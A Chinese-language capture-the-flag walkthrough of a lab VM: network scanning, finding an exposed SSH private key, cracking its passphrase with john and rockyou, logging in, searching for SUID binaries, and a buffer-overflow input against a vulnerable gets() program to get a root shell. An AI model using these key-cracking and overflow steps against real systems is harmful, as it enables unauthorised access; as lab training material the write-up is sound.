CTF训练 SSH服务（1）

**

一、探测靶场地址

探测之前要注意攻击机的网络连接模式是桥接模式。关于虚拟机的网络模式的选择的原因。
**

root@kali:~# netdiscover -r 192.168.1.1/24

这里解释一下：

1. Netdiscover是一个主动/被动的ARP侦查工具。该工具在不使用DHCP的无线网络上非常有用。使用Netdiscover工具可以在网络上扫描IP地址，ARP侦查工具Netdiscover检查在线主机或搜索为它们发送的ARP请求。用来发现局域网中的主机。
   2.DHCP（Dynamic Host Configuration Protocol，动态主机配置协议）通常被应用在大型的局域网络环境中，主要作用是集中的管理、分配IP地址，使网络环境中的主机动态的获得IP地址、Gateway地址、DNS服务器地址等信息，并能够提升地址的使用率。
   DHCP协议采用客户端/服务器模型，主机地址的动态分配任务由网络主机驱动。当DHCP服务器接收到来自网络主机申请地址的信息时，才会向网络主机发送相关的地址配置等信息，以实现网络主机地址信息的动态配置。

**

二、测试主机与靶场的连通性

**

root@kali:~# ping  

以上证明两个机器之间已经联通，之后我们进行实验。
**

三、端口扫描

**

root@kali:~# nmap -sV 192.168.1.107

root@kali:~# nmap -sV 192.168.1.107
扫描结果：
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-04 21:37 CST
Nmap scan report for 192.168.1.107
Host is up (0.00013s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp    open  http    nginx 1.10.3
31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)
MAC Address: 08:00:27:50:7F:AC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds

**

四、分析探测结果

**

http://192.168.1.107:31337/

查看页面源代码，没有获得信息。

**

五、探测隐藏文件

**

root@kali:~# dirb http://192.168.1.107:31337/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul  5 17:25:10 2019
URL_BASE: http://192.168.1.107:31337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.107:31337/ ----
+ http://192.168.1.107:31337/.bash_history (CODE:200|SIZE:19)                                                                                       
+ http://192.168.1.107:31337/.bashrc (CODE:200|SIZE:3526)                                                                                           
+ http://192.168.1.107:31337/.profile (CODE:200|SIZE:675)                                                                                           
+ http://192.168.1.107:31337/.ssh (CODE:200|SIZE:43)                                                                                                
+ http://192.168.1.107:31337/robots.txt  (CODE:200|SIZE:70)                                                                                          
                                                                                                                                                    
-----------------
END_TIME: Fri Jul  5 17:25:24 2019
DOWNLOADED: 4612 - FOUND: 5

可以看到五个搜索结果。
首先我们打开敏感文件(robot.txt)：

User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes

打开敏感文件,得到flag值：
查到私钥，公钥文件。在这里我们不需要下载公钥，因为公钥是存在服务器上的。

**

六、登陆ssh

**

root@kali:~# cd 桌面/
root@kali:~/桌面# ls -alh
总用量 16K
drwxr-xr-x  2 root root 4.0K 7月   5 17:32 .
drwxr-xr-x 29 root root 4.0K 7月   5 17:32 ..
-r--------  1 root root  395 7月   5 17:32 authorized_keys
-r--------  1 root root 1.8K 7月   5 17:31 id_rsa
root@kali:~/桌面# chmod 777 id_rsa 
root@kali:~/桌面# 
文件名赋权限，用私钥登陆ssh服务。

有了私钥之后，我们登陆还需要密码：

root@kali:~/桌面# ssh -i id_rsa  simon@192.168.1.107
The authenticity of host '192.168.1.107 (192.168.1.107)' can't be established.
ECDSA key fingerprint is SHA256:5Tmg/FD7Iga/sFY/1z4etq44S8/bmokfg3R3VyjHtVM.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.107' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 

破解ssh私钥：

root@kali:~/桌面# ssh2john id_rsa  >tsacrack   //转化为john可识别信息。
root@kali:~/桌面# ls -al
总用量 20
drwxr-xr-x  2 root root 4096 7月   5 17:44 .
drwxr-xr-x 29 root root 4096 7月   5 17:32 ..
-r--------  1 root root  395 7月   5 17:32 authorized_keys
-rw-------  1 root root 1766 7月   5 17:31 id_rsa
-rw-r--r--  1 root root 3553 7月   5 17:46 tsacrack         //转化完毕
root@kali:~/桌面# zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack  //进行解密
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
starwars         (id_rsa ）  //解密结果
1g 0:00:00:00  9.090g/s 6081p/s 6081c/s 6081C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/桌面# ssh -i id_rsa  simon@192.168.1.107  //登陆ssh
Enter passphrase for key 'id_rsa': 
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$ 

simon@covfefe:~$ pwd   //pwd命令pwd是Print Working Directory的缩写，其功能是显示当前所在工作目录的全路径。主要用在当不确定当前所在位置时，通过pwd来查看当前目录的绝对路径。
/home/simon
simon@covfefe:~$ ls
http_server.py  robots.txt
simon@covfefe:~$ cd /root  //  /root 目录是root用户在别的用户上创建的目录，别的用户不具有root权限无法访问/
simon@covfefe:/root$ ls
flag.txt  read_message.c
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ find / -perm -4000 2>/dev/null  //找具有root执行权限的文件
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message    //此文件跟root下的read_message.c类似，我们查看一下。
/bin/umount
/bin/su
/bin/mount
/bin/ping
simon@covfefe:/root$ cat read_message.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20];        //根据缓冲区溢出。
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }

}
simon@covfefe:/root$ read_message
What is your name?
simonAAAAAAAAAAAAAAA/bin/sh
Sorry simonAAAAAAAAAAAAAAA/bin/sh, you're not Simon! The Internet Police have been informed of this violation.
simon@covfefe:/root$ read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:

# pwd             //进入root目录下。
/root
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
# 

小结：

netdiscover -r  192.168.1.1/24  //扫描局域网内存活的主机

ping  192.168.1.107 //测试连通性

dirb http://192.68.1.107:31337//查看隐藏目录

ssh  -i  私钥  用户名@ip地址  //登陆ssh 

ssh2john 私钥文件 > isacrack //将私钥文件转化为john可识别文件。

zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack  //进行解密  
第一个文件是kali自带的字典。

pwd //查看当前路径 

find / -perm -4000 2>/dev/null

或者

find  /home -user root -ls

linux中 /dev/null命令

禁止标准错误

[root@zhoucentos log]# rm filename1 
rm: 无法删除"filename1": 没有那个文件或目录
[root@zhoucentos log]# rm filename1 2>/dev/null

find / -perm -4000 2>/dev/null的命令解释。

find / -perm -4000 2>/dev/null的命令解释